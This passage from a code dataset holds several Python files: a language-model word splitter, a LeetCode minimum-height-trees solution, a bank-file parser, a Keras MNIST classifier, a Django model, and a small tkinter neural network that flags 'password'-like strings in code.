language model\n self._unigrams = {}\n self._bigrams = {}\n self._numUnigrams = 0\n self._numBigrams = 0\n self._bows = {}\n with open(lmFile, \"r\") as f:\n while True:\n line = strip(f.readline())\n if line:\n if line == \"\\\\end\\\\\":\n break\n\n if line == \"\\\\1-grams:\":\n while True:\n line = strip(f.readline())\n if not line:\n break\n parts = split(line)\n self._unigrams[parts[1]] = float(parts[0]) * lmWeight\n self._numUnigrams += 1\n if len(parts) > 2:\n self._bows[parts[1]] = float(parts[2])\n\n elif line == \"\\\\2-grams:\":\n while True:\n line = strip(f.readline())\n if not line:\n break\n parts = split(line)\n if not parts[1] in self._bigrams:\n self._bigrams[parts[1]] = {}\n self._bigrams[parts[1]][parts[2]] = float(parts[0]) * lmWeight\n self._numBigrams += 1\n\n if self._bigrams and self._unigrams:\n break\n\n # read character likelihoods from char text file\n charCounts = {}\n charBigramCounts = {}\n charBigramTotals = {}\n totalChars = 0\n lastCh = None\n with open(charTextFile, \"r\") as f:\n for line in f:\n for ch in strip(line).lower():\n if not ch in charCounts:\n charCounts[ch] = 0\n if not lastCh is None:\n if not lastCh in charBigramCounts:\n charBigramCounts[lastCh] = {}\n charBigramTotals[lastCh] = 0\n if not ch in charBigramCounts[lastCh]:\n charBigramCounts[lastCh][ch] = 0\n charBigramCounts[lastCh][ch] += 1\n charBigramTotals[lastCh] += 1\n charCounts[ch] += 1\n totalChars += 1\n lastCh = ch\n\n # add one smoothing for unseen character bigrams\n for ch in charCounts:\n for nextCh in charCounts:\n if not nextCh in charBigramCounts[ch]:\n charBigramCounts[ch][nextCh] = 1\n charBigramTotals[ch] += 1\n\n self._charUnigrams = {}\n self._charBigrams = {}\n for ch in charCounts:\n self._charBigrams[ch] = {}\n for nextCh in 
charBigramCounts[ch]:\n p = float(charBigramCounts[ch][nextCh]) / charBigramTotals[ch]\n self._charBigrams[ch][nextCh] = log10(p)\n self._charUnigrams[ch] = log10(float(charCounts[ch]) / totalChars)\n\n assert(\" \" in self._charUnigrams)\n\n\n\n def split(self, toSplit):\n\n if len(toSplit) < 2:\n return toSplit\n\n lowered = toSplit.lower()\n\n # find potential tokens and cache indices of tokens starting at each character\n tokens = {}\n chPrefixCache = {}\n j = 0\n for ch in set(lowered):\n for tok in self._unigrams:\n if tok.startswith(ch) and len(tok) <= len(lowered):\n tokens[j] = tok\n if not ch in chPrefixCache:\n chPrefixCache[ch] = set()\n chPrefixCache[ch].add(j)\n j += 1\n\n if not tokens:\n return toSplit\n\n\n # find most likely token sequence\n m = [ [float(\"-infinity\")] * len(lowered) for tok in tokens]\n back = [ [None] * len(lowered) for tok in tokens]\n startedToks = [ set() for ch in range(len(lowered))]\n beam = set()\n\n # initialization\n if not lowered[0] in chPrefixCache or not lowered[0] in self._charUnigrams:\n return toSplit\n\n for j in chPrefixCache[lowered[0]]:\n tok = tokens[j]\n if len(tok) == 1:\n startedToks[0].add(j)\n beam.add(j)\n elif tok[1] == lowered[1] and len(tok) <= len(lowered):\n startedToks[0].add(j)\n beam.add(j)\n\n for j in startedToks[0]:\n tok = tokens[j]\n if len(tok) == 1 and tok in self._charUnigrams:\n try:\n m[j][0] = (self._unigrams[tok] + self._charUnigrams[tok]\n + self._charBigrams[tok][\" \"] + self._charUnigrams[\" \"])\n back[j][0] = j\n except KeyError:\n m[j][0] = float(\"-infinity\")\n \n\n\n # recursion\n for i in range(1, len(lowered)):\n ch = lowered[i]\n\n # inspect new tokens starting at current character\n if ch in chPrefixCache:\n for j in chPrefixCache[ch]:\n tok = tokens[j]\n if len(tok) == 1:\n startedToks[i].add(j)\n elif i < len(lowered) - 1 and i + len(tok) <= len(lowered):\n if tok[1] == lowered[i+1]:\n startedToks[i].add(j)\n\n nextBeam = set(beam)\n\n # find best ended token and prune impossible continuing tokens\n for n in range(i+1):\n pruned = set()\n for j in startedToks[i-n]:\n tok = tokens[j]\n if len(tok) > n:\n if tok[n] != ch: # current char doesn't match continuation of token\n pruned.add(j)\n\n elif n == len(tok) - 1: # current char ends a token\n nextBeam.add(j)\n try:\n lastCh = tok[0]\n tokenCharLike = self._charUnigrams[lastCh]\n if len(tok) > 1:\n for ch in tok[1:]:\n try:\n tokenCharLike += self._charBigrams[lastCh][ch] + self._charUnigrams[ch]\n except KeyError:\n tokenCharLike += float(\"-infinity\")\n lastCh = ch\n tokenCharLike += self._charBigrams[lastCh][\" \"] + self._charUnigrams[\" \"]\n except KeyError:\n tokenCharLike = float(\"-infinity\")\n\n\n # set back pointers\n for k in beam:\n lastTok = tokens[k]\n lastLike = 0.0\n if i-len(tok) >= 0:\n lastLike = m[k][i-len(tok)]\n\n try:\n like = lastLike + tokenCharLike + self._bigrams[lastTok][tok]\n except KeyError:\n like = lastLike + tokenCharLike + self._unigrams[tok]\n if lastTok in self._bows:\n like += self._bows[lastTok]\n \n \n if like > m[j][i]:\n m[j][i] = like\n back[j][i] = k\n\n startedToks[i-n] -= pruned\n\n beam = nextBeam\n\n\n # backtrace\n bestJ = None\n bestLike = float(\"-infinity\")\n for j in range(len(tokens)):\n if m[j][len(lowered)-1] > bestLike:\n bestLike = m[j][len(lowered)-1]\n bestJ = j\n\n if bestJ is None:\n return toSplit\n\n path = deque()\n i = len(lowered)-1\n j = bestJ\n while i >= 0:\n tok = tokens[j]\n path.appendleft(tok)\n j = back[j][i]\n i -= len(tok)\n \n\n # split and return original 
string\n final = []\n i = 0\n for tok in path:\n final.append(toSplit[i:i+len(tok)])\n i += len(tok)\n\n return \" \".join(final)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n if len(argv) != 3:\n print(\"Usage: %s arpa_lm_in char_text_in\" % argv[0])\n quit(1)\n\n s = Splitter(argv[1], argv[2])\n print(\"Read %d unigrams and %d bigrams. Type strings to split:\" % (s._numUnigrams, s._numBigrams))\n\n while True:\n line = raw_input(\"> \")\n if not strip(line):\n break\n print( s.split(line))\n print()\n","sub_path":"string-spacer/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":7858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"329838913","text":"\"\"\"\n310. Minimum Height Trees\n\n\nA tree is an undirected graph in which any two vertices are connected by exactly one path. In other words, any connected graph without simple cycles is a tree.\n\nGiven a tree of n nodes labelled from 0 to n - 1, and an array of n - 1 edges where edges[i] = [ai, bi] indicates that there is an undirected edge between the two nodes ai and bi in the tree,\nyou can choose any node of the tree as the root. When you select a node x as the root, the result tree has height h.\nAmong all possible rooted trees, those with minimum height (i.e. min(h)) are called minimum height trees (MHTs).\n\nReturn a list of all MHTs' root labels. You can return the answer in any order.\n\nThe height of a rooted tree is the number of edges on the longest downward path between the root and a leaf.\n\n\n\nExample 1:\n\n\nInput: n = 4, edges = [[1,0],[1,2],[1,3]]\nOutput: [1]\nExplanation: As shown, the height of the tree is 1 when the root is the node with label 1 which is the only MHT.\nExample 2:\n\n\nInput: n = 6, edges = [[3,0],[3,1],[3,2],[3,4],[5,4]]\nOutput: [3,4]\nExample 3:\n\nInput: n = 1, edges = []\nOutput: [0]\nExample 4:\n\nInput: n = 2, edges = [[0,1]]\nOutput: [0,1]\n\n\nConstraints:\n\n1 <= n <= 2 * 104\nedges.length == n - 1\n0 <= ai, bi < n\nai != bi\nAll the pairs (ai, bi) are distinct.\nThe given input is guaranteed to be a tree and there will be no repeated edges.\n\n\n\nSolution\nOverview\nAs the hints suggest, this problem is related to the graph data structure. Moreover, it is closely related to the problems of Course Schedule and Course Schedule II.\nThis relationship is not evident, yet it is the key to solve the problem, as one will see later.\n\nFirst of all, as a straight-forward way to solve the problem, we can simply follow the requirements of the problem, as follows:\n\nStarting from each node in the graph, we treat it as a root to build a tree. 
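Before the next record continues: a note on the Splitter class above. Its split() method runs a Viterbi search over a lattice scored with token unigrams, token bigrams with backoff weights, and character transition probabilities. The core dynamic program is easier to see in isolation, so here is a minimal unigram-only sketch written for this note; the function name and the toy probability table are invented for illustration and are not part of the original file.

def viterbi_split(s, unigram_logprob, max_word_len=20):
    """Split s into words maximizing the summed unigram log10 probabilities."""
    n = len(s)
    best = [float("-inf")] * (n + 1)  # best[i] = best score for s[:i]
    back = [0] * (n + 1)              # back[i] = start index of the last word in s[:i]
    best[0] = 0.0
    for i in range(1, n + 1):
        for j in range(max(0, i - max_word_len), i):
            w = s[j:i]
            if w in unigram_logprob and best[j] + unigram_logprob[w] > best[i]:
                best[i] = best[j] + unigram_logprob[w]
                back[i] = j
    if best[n] == float("-inf"):
        return s  # no full segmentation found; return unsplit, like the class above
    words, i = [], n
    while i > 0:
        words.append(s[back[i]:i])
        i = back[i]
    return " ".join(reversed(words))

# e.g. viterbi_split("thisisatest", {"this": -1.0, "is": -0.7, "a": -0.5, "test": -1.2})
# -> "this is a test"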
Furthermore, we would like to know the distance between this root node and the rest of the nodes.\nThe maximum of the distance would be the height of this tree.\n\nThen according to the definition of Minimum Height Tree (MHT), we simply filter out the roots that have the minimal height among all the trees.\n\nThe first step we describe above is actually the problem of Maximum Depth of N-ary Tree, which is to find the maximum distance from the root to the leaf nodes.\nFor this, we can either apply the Depth-First Search (DFS) or Breadth-First Search (BFS) algorithms.\n\nWithout a rigid proof, we can see that the above straight-forward solution is correct, and it would work for most of the test cases.\n\nHowever, this solution is not efficient, whose time complexity would be O(N^2) where N is the number of nodes in the tree.\nAs one can imagine, it will result in a Time Limit Exceeded exception in the online judge.\n\nAs a spoiler alert, in this article, we will present a topological-sorting-like algorithm with time complexity of O(N), which is also the algorithm to solve the well-known course schedule problems.\n\n\n\"\"\"\nclass MinimumHeightTrees:\n\n    class Graph:\n\n        def __init__(self, n, edges):\n\n            self.V = n\n            self.degree = [0 for _ in range(self.V)]\n            self.edges = [[] for _ in range(self.V)]\n            for c in edges:\n                self.degree[c[0]] += 1\n                self.degree[c[1]] += 1\n\n                self.edges[c[0]].append(c[1])\n                self.edges[c[1]].append(c[0])\n\n        def minHighTree(self):\n\n            if self.V == 1:\n                return [0]\n\n            level = []\n            for i in range(len(self.degree)):\n                if self.degree[i] == 1:\n                    level.append(i)\n\n            nums = self.V\n            while nums > 2:\n                nums -= len(level)\n                tmp = []\n\n                for i in level:\n                    for c in self.edges[i]:\n                        self.degree[c] -= 1\n                        if self.degree[c] == 1:\n                            tmp.append(c)\n                level = tmp\n\n            return level\n\n    def findMinHeightTrees(self, n, edges):\n        \"\"\"\n        :type n: int\n        :type edges: List[List[int]]\n        :rtype: List[int]\n        \"\"\"\n        g = MinimumHeightTrees.Graph(n, edges)\n        return g.minHighTree()\n\n    \"\"\"\n    \n    Approach 1: Topological Sorting\n    Intuition\n    \n    First of all, let us clarify some concepts.\n    \n    The distance between two nodes is the number of edges that connect the two nodes.\n    \n    Note, normally there could be multiple paths to connect nodes in a graph. In our case though, since the input graph can form a tree from any node, as specified in the problem, there could only be one path between any two nodes. In addition, there would be no cycle in the graph. As a result, there would be no ambiguity in the above definition of distance.\n    \n    The height of a tree can be defined as the maximum distance between the root and all its leaf nodes.\n    \n    With the above definitions, we can rephrase the problem as finding out the nodes that are overall close to all other nodes, especially the leaf nodes.\n    \n    If we view the graph as the area of a circle, and the leaf nodes as the periphery of the circle, then what we are looking for are actually the centroids of the circle, i.e. nodes that are close to all the peripheral nodes (leaf nodes).\n    \n    example of graph\n    \n    For instance, in the above graph, it is clear that the node with the value 1 is the centroid of the graph. 
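As an aside, the class just defined can be exercised directly against the examples quoted in the problem statement; this tiny harness is added here for illustration and is not part of the original record.

solver = MinimumHeightTrees()
assert sorted(solver.findMinHeightTrees(4, [[1, 0], [1, 2], [1, 3]])) == [1]
assert sorted(solver.findMinHeightTrees(6, [[3, 0], [3, 1], [3, 2], [3, 4], [5, 4]])) == [3, 4]
assert solver.findMinHeightTrees(1, []) == [0]
assert sorted(solver.findMinHeightTrees(2, [[0, 1]])) == [0, 1]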
If we pick the node 1 as the root to form a tree, we would obtain a tree with the minimum height, compared to other trees that are formed with any other nodes.\n \n Before we proceed, here we make one assertion which is essential to the algorithm.\n \n For the tree-alike graph, the number of centroids is no more than 2.\n \n If the nodes form a chain, it is intuitive to see that the above statement holds, which can be broken into the following two cases:\n \n If the number of nodes is even, then there would be two centroids.\n If the number of nodes is odd, then there would be only one centroid.\n example of centroids\n \n For the rest of cases, we could prove by contradiction. Suppose that we have 3 centroids in the graph, if we remove all the non-centroid nodes in the graph, then the 3 centroids nodes must form a triangle shape, as follows:\n \n triangle\n \n Because these centroids are equally important to each other, and they should equally close to each other as well. If any of the edges that is missing from the triangle, then the 3 centroids would be reduced down to a single centroid.\n \n However, the triangle shape forms a cycle which is contradicted to the condition that there is no cycle in our tree-alike graph. Similarly, for any of the cases that have more than 2 centroids, they must form a cycle among the centroids, which is contradicted to our condition.\n \n Therefore, there cannot be more than 2 centroids in a tree-alike graph.\n \n Algorithm\n \n Given the above intuition, the problem is now reduced down to looking for all the centroid nodes in a tree-alike graph, which in addition are no more than two.\n \n The idea is that we trim out the leaf nodes layer by layer, until we reach the core of the graph, which are the centroids nodes.\n \n trim\n \n Once we trim out the first layer of the leaf nodes (nodes that have only one connection), some of the non-leaf nodes would become leaf nodes.\n \n The trimming process continues until there are only two nodes left in the graph, which are the centroids that we are looking for.\n \n The above algorithm resembles the topological sorting algorithm which generates the order of objects based on their dependencies. For instance, in the scenario of course scheduling, the courses that have the least dependency would appear first in the order.\n \n In our case, we trim out the leaf nodes first, which are the farther away from the centroids. At each step, the nodes we trim out are closer to the centroids than the nodes in the previous step. At the end, the trimming process terminates at the centroids nodes.\n \n Implementation\n \n Given the above algorithm, we could implement it via the Breadth First Search (BFS) strategy, to trim the leaf nodes layer by layer (i.e. level by level).\n \n Initially, we would build a graph with the adjacency list from the input.\n \n We then create a queue which would be used to hold the leaf nodes.\n \n At the beginning, we put all the current leaf nodes into the queue.\n \n We then run a loop until there is only two nodes left in the graph.\n \n At each iteration, we remove the current leaf nodes from the queue. While removing the nodes, we also remove the edges that are linked to the nodes. As a consequence, some of the non-leaf nodes would become leaf nodes. 
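As another aside, the straight-forward O(N^2) baseline described earlier in this record (run a BFS from every candidate root and keep the roots of minimal height) is short to write down and is handy as a cross-check for the trimming approach on small trees. A sketch with names invented here, assuming the same edge-list input:

from collections import deque

def min_height_roots_bruteforce(n, edges):
    """O(N^2) baseline: BFS from every node, keep the roots of minimal height."""
    adj = [[] for _ in range(n)]
    for a, b in edges:
        adj[a].append(b)
        adj[b].append(a)

    def height(root):
        seen = {root}
        q = deque([root])
        h = -1
        while q:
            h += 1  # one BFS level = one more edge of height
            for _ in range(len(q)):
                u = q.popleft()
                for v in adj[u]:
                    if v not in seen:
                        seen.add(v)
                        q.append(v)
        return h

    heights = [height(r) for r in range(n)]
    best = min(heights)
    return [r for r, h in enumerate(heights) if h == best]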
And these are the nodes that would be trimmed out in the next iteration.\n \n The iteration terminates when there are no more than two nodes left in the graph, which are the desired centroids nodes.\n \n Here are some sample implementations that are inspired from the post of dietpepsi in the discussion forum.\n \n \"\"\"\n def doit_topsort(self, n: int, edges: list) -> list:\n\n # base cases\n if n <= 2:\n return [i for i in range(n)]\n\n # Build the graph with the adjacency list\n neighbors = [set() for i in range(n)]\n for start, end in edges:\n neighbors[start].add(end)\n neighbors[end].add(start)\n\n # Initialize the first layer of leaves\n leaves = []\n for i in range(n):\n if len(neighbors[i]) == 1:\n leaves.append(i)\n\n # Trim the leaves until reaching the centroids\n remaining_nodes = n\n while remaining_nodes > 2:\n remaining_nodes -= len(leaves)\n new_leaves = []\n # remove the current leaves along with the edges\n while leaves:\n leaf = leaves.pop()\n # the only neighbor left for the leaf node\n neighbor = neighbors[leaf].pop()\n # remove the only edge left\n neighbors[neighbor].remove(leaf)\n if len(neighbors[neighbor]) == 1:\n new_leaves.append(neighbor)\n\n # prepare for the next round\n leaves = new_leaves\n\n # The remaining nodes are the centroids of the graph\n return leaves\n","sub_path":"PythonLeetcode/leetcodeM/310_MinimumHeightTrees.py","file_name":"310_MinimumHeightTrees.py","file_ext":"py","file_size_in_byte":10779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"33582635","text":"class Devolvidos:\n\n def abrir(self, path):\n with open(path, encoding='latin-1') as entrada:\n dados = entrada.read().splitlines()\n return dados\n\n def montar_mapa(self, lista):\n mapa = {}\n codigo = lista[0][1:4]\n nome = lista[0][4:43]\n for item in lista[1:-1]:\n status = item[457:458]\n if status == '3' or status == '4':\n data = item[477:485]\n protocolo = item[447:457]\n if not codigo in mapa:\n mapa[codigo] = {}\n mapa[codigo][nome] = {}\n if not data in mapa[codigo][nome]:\n mapa[codigo][nome][data] = [1, int(item[471:476]),[f'{protocolo};{item[471:476]}']]\n else:\n valor = int(item[471:476])\n mapa[codigo][nome][data][0] += 1\n mapa[codigo][nome][data][1] += valor\n mapa[codigo][nome][data][2].append(f'{protocolo};{valor}')\n return mapa\n\n def processar_lista(self, path, lista_base):\n for item in lista_base:\n codigo = item.split(' ')[0]\n meio = item.split(' ')[-1]\n if meio == 'TED':\n if 'R' + codigo in path:\n arquivo = self.abrir(path)\n mapa = self.montar_mapa(arquivo)\n return mapa\n\n def gravar(self, linha):\n with open('lista_devolvidos.txt', 'a') as saida:\n saida.write(linha + '\\n')\n","sub_path":"calcula custa devolvidos/classes/devolvidos.py","file_name":"devolvidos.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"168587041","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nnp.random.seed(1212)\r\n\r\nimport keras\r\nfrom keras.models import Model\r\nfrom keras.layers import *\r\nfrom keras import optimizers\r\nfrom sklearn.model_selection import train_test_split\r\n# file open\r\ndf_train = pd.read_csv('C:/Users/user/Desktop/kaggle/mnist/train.csv')\r\ndf_test = pd.read_csv('C:/Users/user/Desktop/kaggle/mnist/test.csv')\r\n\r\nprint(\"Open Success\\n\")\r\n\r\n# reshape dataset to array\r\ndf_features = df_train.iloc[:, 1:785]\r\ndf_label = df_train.iloc[:, 0]\r\n\r\nX_test = df_test.iloc[:, 
0:784]\r\n\r\nX_train, X_cv, y_train, y_cv = train_test_split(df_features, df_label, test_size = 0.2, random_state = 1212)\r\n# pandas removed DataFrame.as_matrix(); to_numpy() is the current equivalent\r\nX_train = X_train.to_numpy().reshape(33600, 784) #(33600, 784)\r\nX_cv = X_cv.to_numpy().reshape(8400, 784) #(8400, 784)\r\n\r\nX_test = X_test.to_numpy().reshape(28000, 784)\r\n\r\n# normalize\r\nX_train = X_train.astype('float32'); \r\nX_cv = X_cv.astype('float32'); \r\nX_test = X_test.astype('float32')\r\nX_train /= 255; X_cv /= 255; X_test /= 255\r\n\r\n# One Hot Encoded\r\nnum_digits = 10\r\ny_train = keras.utils.to_categorical(y_train, num_digits)\r\ny_cv = keras.utils.to_categorical(y_cv, num_digits) \r\n\r\n# make model\r\nn_input = 784 # number of features\r\nn_hidden_1 = 300\r\nn_hidden_2 = 100\r\nn_hidden_3 = 100\r\nn_hidden_4 = 200\r\nn_hidden_5 = 100\r\nnum_digits = 10\r\n\r\nInp = Input(shape=(784,))\r\nx = Dense(n_hidden_1, activation='relu', name = \"Hidden_Layer_1\", bias_initializer='he_normal')(Inp)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_2, activation='relu', name = \"Hidden_Layer_2\")(x)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_3, activation='relu', name = \"Hidden_Layer_3\")(x)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_4, activation='relu', name = \"Hidden_Layer_4\")(x)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_5, activation='relu', name = \"Hidden_Layer_5\")(x)\r\noutput = Dense(num_digits, activation='softmax', name = \"Output_Layer\")(x)\r\n\r\nmodel = Model(Inp, output)\r\nmodel.summary()\r\n\r\n# hyperparameters\r\nlearning_rate = 0.1\r\ntraining_epochs = 50\r\nbatch_size = 100\r\nsgd = optimizers.SGD(lr=learning_rate)\r\n\r\n# We rely on the plain vanilla Stochastic Gradient Descent as our optimizing methodology\r\n#model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\r\n\r\n#history1 = model.fit(X_train, y_train, batch_size = batch_size, epochs = training_epochs, verbose = 2, validation_data=(X_cv, y_cv))\r\n\r\n# train\r\nadam = keras.optimizers.Adam(lr=learning_rate)\r\nmodel2 = Model(Inp, output)\r\n\r\nmodel2.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n\r\nhistory2 = model2.fit(X_train, y_train,batch_size = batch_size, epochs = training_epochs, verbose = 2, validation_data=(X_cv, y_cv))\r\n\r\n# test\r\ntest_pred = pd.DataFrame(model2.predict(X_test, batch_size=200))\r\ntest_pred = pd.DataFrame(test_pred.idxmax(axis = 1))\r\ntest_pred.index.name = 'ImageId'\r\ntest_pred = test_pred.rename(columns = {0: 'Label'}).reset_index()\r\ntest_pred['ImageId'] = test_pred['ImageId'] + 1\r\n\r\ntest_pred.head() \r\n\r\n#csv output\r\ntest_pred.to_csv('mnist_submission.csv', index = False)","sub_path":"kaggle_mnist.py","file_name":"kaggle_mnist.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503018260","text":"# models.py ---\n#\n# Filename: models.py\n# Author: Louise \n# Created: Thu Apr 30 22:49:36 2020 (+0200)\n# Last-Updated: Sat May 2 21:41:22 2020 (+0200)\n# By: Louise \n#\n\"\"\"\nRegister the only model in the app, SavedProduct.\n\"\"\"\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nfrom products.models import Product\n\nclass SavedProduct(models.Model):\n    \"\"\"\n    SavedProduct maps a user to several products\n    that were found by the search engine to be\n    substitutes.\n    \"\"\"\n    orig_product = models.ForeignKey(Product,\n                                     on_delete=models.CASCADE,\n                                     related_name='original_savedproducts')\n    sub_product = 
models.ForeignKey(Product,\n                                    on_delete=models.CASCADE,\n                                    related_name='replaced_savedproducts')\n    user = models.ForeignKey(User,\n                             on_delete=models.CASCADE,\n                             related_name='saved_products')\n\n    class Meta:\n        \"\"\"\n        Add constraints to guarantee uniqueness of user and sub_product.\n        By that, I mean that a given user can save a given sub_product only once.\n        \"\"\"\n        constraints = [\n            models.UniqueConstraint(fields=[\"user\", \"sub_product\"],\n                                    name=\"each_product_saved_only_once\")\n        ]\n","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"645002300","text":"from tkinter import *\r\nfrom tkinter import filedialog as fd\r\nimport numpy as np\r\nimport random\r\n\r\n\r\ndef sigmoid(x):\r\n    \"\"\"sigmoid function; works with both numbers and vectors (element-wise)\"\"\"\r\n    return 1 / (1 + np.exp(-x))\r\n\r\ndef sigmoid_prime(x):\r\n    \"\"\"derivative of the sigmoid function; works with both numbers and vectors (element-wise)\"\"\"\r\n    return sigmoid(x) * (1 - sigmoid(x))\r\n\r\ndef ExsamplesCreator():\r\n    # text.insert('end','Training the neural network...')\r\n    f=open(text1.get())\r\n    mass=f.readlines()\r\n    # wordText=''\r\n    mass = [line.rstrip() for line in mass]\r\n    exsamples=[]\r\n    \r\n    answerOfExsamples=[]\r\n    for i in range(len(mass)):\r\n        exsamples.append([])\r\n        answerOfExsamples.append([]) \r\n        answerOfExsamples[i].append(int(mass[i][-2]))\r\n        mass[i]=mass[i][1:-4]\r\n        for j in range(0,len(mass[i]),2):\r\n            exsamples[i].append(int(mass[i][j]))\r\n    exsamples=np.array(exsamples)\r\n    answerOfExsamples=np.array(answerOfExsamples)\r\n    print(answerOfExsamples)\r\n    print(exsamples)\r\n    return(exsamples, answerOfExsamples)\r\n\r\n\r\n\r\ndef WeightCreator():\r\n    W1=[]\r\n    W2=[]\r\n    bians1=[]\r\n    bians2=[]\r\n    for i in range(64):\r\n        W1.append([])\r\n        for j in range(8):\r\n            W1[i].append(round(random.uniform(-0.5,0.5),3))\r\n            # print(W[0][i])\r\n    W2.append([])\r\n    bians1.append([])\r\n    for i in range(64):\r\n        W2[0].append(round(random.uniform(-0.5,0.5),3))\r\n        bians1[0].append(round(random.uniform(-0.5,0.5),3))\r\n    bians2.append(round(random.uniform(-0.5,0.5),3))\r\n    bians1=np.array(bians1)\r\n    bians2=np.array(bians2)\r\n    W1=np.array(W1)\r\n    W2=np.array(W2)\r\n    # print(W1,W2)\r\n    return(W1,W2,bians1,bians2)\r\n\r\ndef LearningFirstLayer(exsample,W1,bians1):\r\n    summator=exsample.dot(W1.T)+bians1[0]\r\n    # print(summator)\r\n    active=sigmoid(summator)\r\n    # print(active)\r\n    return(active,summator)\r\n\r\ndef LearningSecondLayer(active,W2,bians2):\r\n    summator=active.dot(W2.T)+bians2[0]\r\n    #print(summator)\r\n    answer=sigmoid(summator)\r\n    # print('ans',answer)\r\n    return(answer,summator)\r\n\r\ndef ErrorCorrection(d,W2):\r\n    D2=d*W2\r\n    # print('W2',W2)\r\n#    print(W2.shape)\r\n    return(D2)\r\n\r\ndef WeightCorrection(vector,W1,W2,\r\n                     bians1,bians2,\r\n                     D2,summatorFunction,\r\n                     summatorFunction2,\r\n                     activeFunction,d):\r\n    # note: these loops apply w += lr * delta * input element by element;\r\n    # the same update could be written with numpy outer products\r\n    #print('len',len(W1))\r\n    for i in range(len(W1)):\r\n        # print('len',len(W1))\r\n        # input()\r\n        bians1[0][i]=bians1[0][i]+D2[0][i]*sigmoid_prime(summatorFunction[i])*a\r\n        for j in range(len(W1[i])):\r\n            W1[i][j]=W1[i][j]+D2[0][i]*sigmoid_prime(summatorFunction[i])*vector[j]*a #x\r\n    for i in range(len(W2[0])):\r\n        W2[0][i]=W2[0][i]+d*sigmoid_prime(summatorFunction2[0])*activeFunction[i]*a\r\n    bians2[0]=bians2[0]+d*sigmoid_prime(summatorFunction2[0])*a\r\n    return(W1,W2,bians1,bians2)\r\n    \r\n\r\n\r\n\r\ndef ButtonLearn():\r\n    # 
text.insert('end','Training the neural network...')\r\n    findWord='password' \r\n    a=0.1\r\n    # fix: declare the weights global so ButtonAnalyze can reuse them after training\r\n    global W1,W2,bians1,bians2\r\n    exsamples,answerOfExsamples = ExsamplesCreator()\r\n    #print(exsamples,answerOfExsamples)\r\n    W1,W2,bians1,bians2 = WeightCreator()\r\n    #print('bians',bians2)\r\n\r\n    #input()\r\n    # text.insert('end','Training the neural network...')\r\n    for j in range(1000):\r\n        print(j)\r\n        for i in range(len(exsamples)):\r\n            \r\n            activeFunction,summatorFunction = LearningFirstLayer(exsamples[i],\r\n                                                                  W1,bians1)\r\n            answerOfNet,summatorFunction2 = LearningSecondLayer(activeFunction,\r\n                                                                W2,bians2)\r\n            d = answerOfExsamples[i]-answerOfNet\r\n            D2 = ErrorCorrection(d,W2)\r\n\r\n            # print('D2',D2)\r\n            #print(D2.shape)\r\n            # print(W1)\r\n            W1,W2,bians1,bians2=WeightCorrection(exsamples[i],W1,W2,\r\n                                                 bians1,bians2,D2,\r\n                                                 summatorFunction,\r\n                                                 summatorFunction2,\r\n                                                 activeFunction,d)\r\n    text.insert('end','The artificial neural network has been trained successfully \\n')\r\n    # print(W1)\r\n\r\n\r\ndef similar(text):\r\n    #if not len(first) == len(second):\r\n    #   return False\r\n    word='password' \r\n    mass=[]\r\n    for i in range(len(text)-len(word)):\r\n        find=text[i:i+len(word)]\r\n        # print(find)\r\n        if len(find) - sum(l1==l2 for l1, l2 in zip(find, word)) < 5:\r\n            #return False\r\n            mass.append(text[i:i+len(word)])\r\n    return (mass)\r\n\r\ndef ButtonAnalyze():\r\n    f=open(text2.get(), encoding=\"utf-8\")\r\n    f=f.readlines()\r\n    codeText=''\r\n    for i in range(len(f)):\r\n        codeText+=f[i]\r\n    #print(text)\r\n    word='password'\r\n#mass=[]\r\n#for i in range(len(f)-len(word)):\r\n    \r\n   # mass.append(similar(f[i:i+len(word)]\r\n    \r\n#print(f)\r\n    massOfSimilarWords=similar(codeText)\r\n    \r\n\r\n    print(massOfSimilarWords)\r\n    \r\n    analyzingVector=[]\r\n    for i in range(len(massOfSimilarWords)):\r\n        analyzingVector.append([])\r\n        print(massOfSimilarWords[i])\r\n        for j in range(len(massOfSimilarWords[i])):\r\n            # print(massOfSimilarWords[i])\r\n            if massOfSimilarWords[i][j]==word[j]:\r\n                # print(massOfSimilarWords[i][j],word[i])\r\n                analyzingVector[i].append(1)\r\n            else:\r\n                #print(massOfSimilarWords[i][j],word[i])\r\n                analyzingVector[i].append(0)\r\n    analyzingVector=np.array(analyzingVector)\r\n    print(analyzingVector)\r\n    for i in range(len(analyzingVector)):\r\n        # fix: pass the trained weights and score the i-th vector; the original\r\n        # called these functions without weight arguments, which raises a TypeError\r\n        # (requires ButtonLearn to have run first)\r\n        activeFunction,summatorFunction = LearningFirstLayer(analyzingVector[i],W1,bians1)\r\n        answerOfNet,summatorFunction2 = LearningSecondLayer(activeFunction,W2,bians2)\r\n        print(answerOfNet)\r\n    \r\n    \r\n    \r\n    \r\ndef insertText1():\r\n    file_name = fd.askopenfilename()\r\n    f = open(file_name)\r\n    s = f.read()\r\n    text.insert('end','Training set:\\n')\r\n    text.insert('end', file_name+'\\n')\r\n    # text.insert(1.0, s)\r\n    text1.insert(0,file_name)\r\n    f.close()\r\n\r\ndef insertText2():\r\n    file_name = fd.askopenfilename()\r\n    f = open(file_name)\r\n    s = f.read()\r\n    text.insert('end','Code under analysis: \\n')\r\n    text.insert('end', file_name + '\\n')\r\n    text2.insert(0,file_name)\r\n    f.close()\r\n\r\n\r\nfindWord='password' \r\na=0.1 \r\nroot = 